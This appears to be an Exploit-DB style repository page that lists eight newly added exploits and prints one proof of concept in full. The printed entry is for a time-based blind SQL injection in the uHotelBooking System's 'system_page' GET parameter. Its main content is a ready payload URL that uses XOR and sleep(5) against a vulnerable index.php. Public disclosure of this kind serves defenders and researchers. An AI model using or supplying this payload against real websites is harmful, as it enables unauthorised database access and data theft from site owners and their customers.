
8 changes to exploits/shellcodes Canarytokens 2019-03-01 - Detection Bypass DVD X Player 5.5.3 - '.plf' Buffer Overflow Netartmedia Vlog System - 'email' SQL Injection Rails 5.2.1 - Arbitrary File Content Disclosure The Company Business Website CMS - Multiple Vulnerabilities uHotelBooking System - 'system_page' SQL Injection Placeto CMS Alpha v4 - 'page' SQL Injection Bootstrapy CMS - Multiple SQL Injection
17 lines
No EOL
631 B
Text
17 lines
No EOL
631 B
Text
# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
|
|
# Date: 21.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.hotel-booking-script.com
|
|
# Demo Site: https://www.hotel-booking-script.com/demo/
|
|
# Version: Lastest
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
# Description: uHotelBooking is a powerful hotel management and online
|
|
booking/reservation site script.
|
|
|
|
----- PoC: SQLi -----
|
|
|
|
Request: http://localhost/[PATH]/index.php
|
|
Vulnerable Parameter: system_page (GET)
|
|
Attack Pattern:
|
|
http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z |